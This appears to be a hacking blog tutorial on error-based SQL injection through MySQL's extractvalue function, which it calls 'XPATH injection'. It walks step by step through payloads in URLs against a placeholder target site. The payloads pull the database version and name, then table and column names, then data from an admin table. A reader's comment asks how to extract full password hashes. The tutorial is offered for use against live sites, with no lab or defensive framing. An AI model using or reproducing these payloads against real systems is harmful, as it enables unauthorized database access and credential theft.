While We are injecting a Site and Then Come to the UNION BASED part .When we Execute Union Based Query meanwhile we Got There a ERROR Message
"The used SELECT statements have a different number of columns"
so we Used There XPATH injection.
let's Start Our XPATH Injection.
Here is a Target Let's Find The Version with XPATH
So here is our Query for Finding The Version in XPATH
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))
let's execute this Query in our Target Site.
http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -
now Let's check The Current Database name There.
Here is the Query for finding the current Database name
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))
Execute this Query in our Target Site.
http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -
Now Let's move on to our Further injecting .
Next is to finding The table names from the database.
Here is The Query for Finding the Table Name.
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))
as we are injecting in XPATH so there we cant get all the tables .so we need to add LIMIT in our query to get The Tables One by One.
So let's Add LIMIT in our Query.
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))
Now Execute this Query in Target Site For Finding The tables
http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -
Increase the limit to get other tables in the current Database.
Here we got the Table of Admin
Here is our query for Getting Columns from the table.
XPATH QUERY:
and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))--
We Execute this query for Getting The Columns.
http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))-- -
Increase the limit for other Columns in the Table.
And The Final Part is to Extracting Data from The Columns.
So Here is our Final Query.
XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))-- -
Execute this Query in the Target Site for Extracting data of Columns From the Target Table.
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
any method to get the full password hash from XPATH or SQL injection. I tried this method but not getting the full hash. :(
ReplyDelete